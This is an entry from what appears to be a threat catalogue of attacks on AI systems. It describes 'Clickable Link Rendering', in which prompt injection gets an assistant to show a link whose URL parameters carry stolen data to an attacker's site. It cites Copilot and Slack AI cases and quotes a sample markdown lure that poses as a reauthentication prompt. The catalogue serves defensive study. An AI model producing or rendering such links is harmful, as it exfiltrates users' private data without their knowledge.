Clickable Link Rendering
Type: technique
Description: The adversary gets AI to present a URL to the user, which is rendered as a link, and can be clicked by a user. The URL leads to an an attacker-controlled website, allowing the adversary to exfiltrate data through URL parameters. Variants include HTML tags and markdown.
Version: 0.1.0
Created At: 2024-10-11 16:54:32 +0300
Last Modified At: 2024-10-11 16:54:32 +0300
External References
Related Objects
- --> Exfiltration (tactic): An adversary can exfiltrate data by embedding it in the parameters of a URL, and getting AI to render it as a clickable link to the user, which clicks it.
- --> Content Security Policy (mitigation): Setting a Content Security Policy can mitigate this technique by disrupting an attacker's ability to provide a URL to a domain under their control.
- <-- Microsoft Copilot: From Prompt Injection to Exfiltration of Personal Information (procedure): Rendering of hyperlinks to attacker controlled domains, resulting in 1-click data exfiltration.
- <-- Data Exfiltration from Slack AI via indirect prompt injection (procedure): Data to exfiltrate is embedded in a URL parameter, rendered as a clickable link through markdown:
Error loading message, [click here to reauthenticate](https://aiexecutiveorder.com?secret=confetti)
.